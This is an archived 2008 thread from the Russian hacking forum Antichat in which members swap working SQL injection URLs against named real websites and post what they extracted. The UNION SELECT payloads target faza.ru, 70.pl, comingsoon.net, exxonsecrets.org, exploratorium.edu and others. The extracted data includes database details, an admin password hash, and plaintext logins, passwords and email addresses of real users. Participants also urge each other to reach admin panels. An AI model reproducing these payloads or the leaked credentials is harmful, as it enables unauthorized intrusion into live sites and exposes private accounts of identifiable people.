ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

26.01.2008, 20:31
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме: 453576
Репутация:
100
|
|
|
|
|

26.01.2008, 21:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
Походу ник админа- faza
а id логина чет-не то. Ну например если id=20, то ник начинается на 20.
http://www.faza.ru/alltop.php?cat=-1+union+select+login+from+users+where+login=20/*
Но там не всё по порядку:
есть 1,2,3,4,7,10,11,20 далее не копал
__________________
BlackHat. MoDL
|
|
|

26.01.2008, 21:18
|
|
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме: 575156
Репутация:
50
|
|
To bobob
Лучше лимитом и сразу логин с пассом
http://www.faza.ru/alltop.php?cat=-1+union+select+concat(login,0x3a,password)+from+us ers+limit+1,1/*
|
|
|

26.01.2008, 21:20
|
|
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
Провел на форуме: 1703454
Репутация:
142
|
|
да, мутный сайт, ну его нафиг!
|
|
|

26.01.2008, 21:22
|
|
Участник форума
Регистрация: 14.07.2007
Сообщений: 108
Провел на форуме: 1888785
Репутация:
305
|
|
Сообщение от Dimi4
Походу ник админа- faza
а id логина чет-не то. Ну например если id=20, то ник начинается на 20.
http://www.faza.ru/alltop.php?cat=-1+union+select+login+from+users+where+login=20/*
Но там не всё по порядку:
есть 1,2,3,4,7,10,11,20 далее не копал
Чё вы жопу рвёте такими запросами?
Вот вам faza:
http://www.faza.ru/alltop.php?cat=-1+union+select+concat_ws(0x3a,login,password)+from +users+limit+5,1/*
faza:5a4c36e900fb4d0a947751e0c59d8661
P.S. Почитайте про LIMIT
Последний раз редактировалось Saint-Sky; 26.01.2008 в 21:24..
|
|
|

26.01.2008, 21:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
Гы, на том сайт, что не хеш, то - 7827887
__________________
BlackHat. MoDL
|
|
|

26.01.2008, 23:10
|
|
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме: 422909
Репутация:
200
|
|
Канадские ресурсы:
http://www.naturetrust.bc.ca/releases.php?id=5+and+1=2+union+select+1,concat(us er(),char(58),database(),char(58),version()),3,4/*
user: dbtnt126@205.178.132.70
database: tntsite
version:4.1.21
http://www.aamc.ca/about.php?id=8+and+1=2+union+select+1,table_name,3 ,4,5,6,7,8+from+information_schema.tables/*
version : 5.0.24a-standard-log 3
tabels( ..,tbl_bestrate 3, tbl_broker 3, tbl_faq 3, tbl_kerry 3, tbl_links 3, tbl_news 3, tbl_rate 3)
http://www.onmyblock.ca/media.php?id=5+and+1=2+union+select+1,2,concat(use r(),char(58),database(),char(58),version()),4/*
user: blockweb_block@localhost
database: blockweb_admin
version:4.1.22
|
|
|

26.01.2008, 23:42
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме: 453576
Репутация:
100
|
|
www.70.pl
Код:
http://www.70.pl/main.php?id=100&ktory_kacik=-5+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,0,1,2/*
5.0.33-log:76@localhost:76
Код:
http://www.70.pl/main.php?id=100&ktory_kacik=-5+union+select+1,2,3,concat_ws(0x3a,sLogin,sPassword,mail),5,6,7,8,9,10,11,12+from+70_tabUser/*
На странице выводится порядка 2.676 записей данных польских юзеров вида
логин:пасс:мыло
admin:skurwysyn9:admin@70.pl
karol:kupka:kupka@gmail.com
karol1:droga2:droga2@o2.pl
mL7:1102860011399kzm:ml7@poczta.onet.pl
superopr:browar:ksiegarnia4u@ksiegarnia4u.pl
rkipias:dorota:rkipias@wp.pl
sambor.jj:290225a:Sambor.jj@wp.pl
fs:42LCEHga:Husar@boo.pl
slodki:7886:slodki@niezabijaj.com
drbadbrain:browar00:drbadbrain@tlen.pl
...и т.д.
|
|
|

27.01.2008, 22:00
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме: 1050662
Репутация:
435
|
|
Хороший буржуйский киношный сайт, пр6
Код:
http://www.comingsoon.net/news/movienews.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,database())/*
смотрим титл 4.1.22:comingso_nextra@csnet-cm-internal:comingso_nextra
сайт про банки, пр6
Код:
http://www.reusablebags.com/facts.php?id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7/*
pono@localhost:4.1.22-standard-log: pono_rub
И еще один буржуйский, пр5
Код:
http://www.exxonsecrets.org/html/personfactsheet.php?id=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database()),9,10/*
greenpeace@localhost:5.0.27:greenpeace
верся >5 так что работает INFORMATION_SCHEMA.TABLES
|
|
|

27.01.2008, 23:14
|
|
Новичок
Регистрация: 20.01.2007
Сообщений: 25
Провел на форуме: 102126
Репутация:
8
|
|
вот веселенький едушный сайт. до админки не догрыз, зато получил пасики от министерских мыльниц. если кто-нить финиширует, то дайте мне знать.
http://qt.exploratorium.edu/cils/resourcelist.php?categoryID=-1+union+select+concat_ws(char(58),username,passwor d)+from+account+limit%200,1
вот через эту штуку можно получить реквизиты. наковырял примерно это:
Код:
admin2:4dooney!2
richauslander:richauslander:dbeck@exploratorium.edu
erniekunze@earthlink.net:vivian (Ernie Kunze)
thomasc@exploratorium.edu:11111
fperson@physics.ucsc.edu:11111
уязвимы все скрипты поголовно. даже регистрация. блин. гдеж там одминка-то))
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|